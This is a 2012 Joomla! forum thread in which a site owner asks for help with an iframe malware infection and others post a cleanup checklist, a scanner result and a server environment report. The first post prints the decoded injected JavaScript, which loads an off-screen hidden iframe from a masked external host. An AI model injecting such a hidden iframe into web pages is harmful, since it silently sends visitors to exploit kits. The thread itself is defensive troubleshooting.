The Joomla! Forum ™

Download

Demo


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 8 posts ] 
  Print view Previous topic | Next topic 
Author Message
MadSilence
PostPosted: Tue Aug 07, 2012 6:49 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Sep 30, 2010 1:35 pm
Posts: 14
Hi guys!

I recently noticed that Avira gave me a warning on my site in IE. I went around and searched for sucpisious code.

When I'm indexing my frontpage I found this in the very top of the page:

It's a javascript and my firend helped me decode it. The it turned out like this:

Code:
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = "http://xxxxx.net/xml.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
}


How the H*** did I first think. Where can that file be that adds this code to my index? and all pages for that matter? Where do i start to search? I guess its one file pretending to be a "plugin" that adds the code on all the pages when run?

Please help=)

My site is: http://www.tuaagder. no


Last edited by mandville on Tue Aug 07, 2012 8:26 am, edited 3 times in total.
Hacker script has been removed -broke link. do not post full hacker code or the full site link as users may folllow it


Top
 Profile  
 
mandville
PostPosted: Tue Aug 07, 2012 8:26 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11644
Location: The Girly Side of Joomla in Sussex
[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic.

[ ] Ensure you have the latest version of Joomla for your 1.5 or 2.5 version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list or recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories More detailed information can be found in the Security Checklist 7

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
Slackervaara
PostPosted: Tue Aug 07, 2012 2:34 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Sat Aug 13, 2011 6:27 am
Posts: 301
I checked your site here and it reported malware, which you already know. This reported sucuri for your site:

malware-entry-mwexploitkitblackhole1

http://sitecheck.sucuri.net/scanner/
Top
 Profile  
 
MadSilence
PostPosted: Wed Aug 08, 2012 6:39 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Sep 30, 2010 1:35 pm
Posts: 14
Yeah I know=) Found that code:D But that was a good scanner BTW!

BUT! My question is. How do I remove this code w.out reinstalling everything. Were looking at MANY hours of work for that to happend=) And, How the H*** did he get in in the first time?=)

Thanks!
Top
 Profile  
 
Slackervaara
PostPosted: Wed Aug 08, 2012 6:56 am 
Joomla! Explorer
Joomla! Explorer

Joined: Sat Aug 13, 2011 6:27 am
Posts: 301
Do you have a backup of your files? It could be used unless it is also infected. But here you will get the advice to download fresh unifected Joomla files and use them instead.

Sucuri has a cleaning service for malware, but it costs 90 USD, but lasts for a year. I guess your site gets fixed then directly after a couple of hours.

To avoid situations like yours I use the security extension Eyesite, that detects changed or new files on the site.
http://www.lesarbresdesign.info/extensions/eyesite
Top
 Profile  
 
mandville
PostPosted: Wed Aug 08, 2012 8:42 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11644
Location: The Girly Side of Joomla in Sussex
MadSilence wrote:
Yeah I know=) And, How the H*** did he get in in the first time?=)

follow the first line of the checklist and it may help us judge

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
MadSilence
PostPosted: Wed Aug 08, 2012 9:04 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Sep 30, 2010 1:35 pm
Posts: 14
FPA report:

Problem Description :: Forum Post Assistant (v1.2.1) : 8th August 2012 wrote:
iFrame virus
Forum Post Assistant (v1.2.1) : 8th August 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 1.5.20-Stable (senu takaa) 18-July-2010
Joomla! Configured :: Yes | Writable (644) | Owner: tuaagder (uid: 59556/gid: 59556) | Group: tuaagder (gid: 59556) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-5-amd64 | Technology: x86_64 | Web Server: Apache/2.2.16 | Encoding: gzip,deflate,sdch | Doc Root: /home/1/t/tuaagder/www | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.3-7+squeeze13 | PHP API: cgi-fcgi | Session Path Writable: Unknown | Display Errors: | Error Reporting: 30711 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: /home/:/tmp/:/usr/lib/php5/:/usr/share/php:/usr/local/php5-suphp/:/usr/bin/:/usr/local/bin/:/bin/ | Uploads: 1 | Max. Upload Size: 128M | Max. POST Size: 128M | Max. Input Time: 60 | Max. Execution Time: 60 | Memory Limit: 256M

MySQL Configuration :: Version: 5.5.25-log (Client:5.1.63) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 670.61 KiB | #of _FPA_TABLE: 92
Detailed Environment :: wrote:
PHP Extensions :: Core (5.3.3-7+squeeze13) | date (5.3.3-7+squeeze13) | ereg () | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | bz2 () | calendar () | ctype () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | standard (5.3.3-7+squeeze13) | posix () | Reflection ($Revision: 300393 $) | SPL (0.2) | shmop () | SimpleXML (0.1) | soap () | sockets () | Phar (2.0.1) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.9.1) | cgi-fcgi () | ADOdb () | curl () | gd () | geoip (1.0.8) | idn () | imagick (3.0.1) | imap () | mcrypt () | mssql () | mysql (1.0) | mysqli (0.1) | odbc (1.0) | pam_auth (0.3) | PDO (1.0.4dev) | pdo_dblib (1.0.1) | pdo_mysql (1.0.2) | PDO_ODBC (1.0.1) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | ps () | pspell () | recode () | SQLite (2.0-dev) | sqlite3 (0.7-dev) | suhosin (0.9.32.1) | svn (0.6.0-dev) | tidy (2.0) | xmlrpc (0.51) | xsl (0.1) | mhash () | Zend Engine (2.3.0) |
Potential Missing Extensions ::

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Extensions Discovered :: wrote:
Components :: SITE :: Wrapper (1.5.0) | User (1.5.0) | MailTo (1.5.0) |
Components :: ADMIN :: Messaging (1.5.0) | Cache Manager (1.5.0) | Akeeba (3.1) | Trash (1.0.0) | Configuration Manager (1.5.0) | FlipPhoto_Pro (1.0.3) | Content Page (1.5.0) | Search (1.5.0) | Newsfeeds (1.5.0) | Banners (1.5.0) | Media Manager (1.5.0) | JEvents (1.5.4a (b1785) | Control Panel (1.5.0) | Plugin Manager (1.5.0) | Template Manager (1.5.0) | Menus Manager (1.5.0) | Mass Mail (1.5.0) | User Manager (1.5.0) | Installation Manager (1.5.0) | JCE (1.5.7.4) | Contact Items (1.0.0) | Polls (1.5.0) | Module Manager (1.5.0) | Frontpage (1.5.0) | Language Manager (1.5.0) | Weblinks (1.5.0) |

Modules :: SITE :: Statistics (1.5.0) | Feed Display (1.5.0) | Newsflash (1.5.0) | Sections (1.5.0) | Menu (1.5.0) | Archived Content (1.5.0) | Search (1.0.0) | Banner (1.5.0) | Random Image (1.5.0) | Login (1.5.0) | Most Read Content (1.5.0) | Footer (1.5.0) | Syndicate (1.5.0) | Related Items (1.0.0) | Breadcrumbs (1.5.0) | Custom HTML (1.5.0) | Who\'s Online (1.0.0) | FlipPhoto Pro (1.0.3) | Poll (1.5.0) | Wrapper (1.0.0) | Latest News (1.5.0) |
Modules :: ADMIN :: Items Stats (1.0.0) | Logged in Users (1.0.0) | Feed Display (1.5.0) | Latest News (1.0.0) | Online Users (1.0.0) | Admin Submenu (1.0.0) | Login Form (1.0.0) | Popular Items (1.0.0) | Footer (1.0.0) | User Status (1.5.0) | Custom HTML (1.5.0) | Toolbar (1.0.0) | Title (1.0.0) | Admin Menu (1.0.0) | Quick Icons (1.0.0) | Unread Items (1.0.0) |

Plugins :: SITE :: Search - Sections (1.5) | Search - Categories (1.5) | Search - Contacts (1.5) | Search - Weblinks (1.5) | Search - Newsfeeds (1.5) | Search - Content (1.5) | Authentication - OpenID (1.5) | Authentication - Example (1.5) | Authentication - Joomla (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | User - Example (1.0) | User - Joomla! (1.5) | Content - Page Navigation (1.5) | Content - Example (1.0) | Content - Email Cloaking (1.5) | Content - Vote (1.5) | Admiror Gallery Engine (2.0 beta) | Content - ContentPassword (1.7.3) | AllVideos (by JoomlaWorks) (3.3) | Content - Load Modules (1.5) | Content - Pagebreak (1.5) | Content - Code Highlighter (Ge (1.5) | Button - Readmore (1.5) | Button - Image (1.0.0) | Button - Pagebreak (1.5) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | Editor - JCE 1.5.7.4 (1.5.7.4) | Editor - Xinha (1.5.1) | Editor - XStandard Lite for Jo (1.0) | Paste (1.5.7.4) | Paste (1.5.7.4) | Advanced Code Editor (1.5.7.4) | File Browser (1.5.7.4) | Image Manager (1.5.7.4) | Media Object support (1.5.7.4) | JCE SPELLCHECKER TITLE (1.5.7.4) | Joomla! Links for Advanced Lin (1.2.1) | Zoo2 Links for Advanced Link (1.0.0) | Advanced Link (1.5.7.4) | Editor - TinyMCE 3 (3.2.6) | JEvents - Record Event Attenda (0.4.2) | System - SEF (1.5) | System - Remember Me (1.5) | System - Debug (1.5) | System - Mootools Upgrade (1.5) | System - Log (1.5) | System - Backlinks (1.5) | System - Legacy (1.5) | System - Cache (1.5) |
Templates Discovered :: wrote:
Templates :: SITE :: rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) | beez (1.0.0) | siteground-j15-38 (1.0.0) |
Templates :: ADMIN :: Khepri (1.0) |


Top
 Profile  
 
Webdongle
PostPosted: Wed Aug 08, 2012 10:52 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
Your Joomla is out of date, how many of the extensions are out of date ?

You now need to delete all folders and files. Then do everything else in the list mandville posted.

_________________
http://weblinksonline.co.uk/joomla-faq.html
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 8 posts ] 


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Who is online

Users browsing this forum: No registered users and 15 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group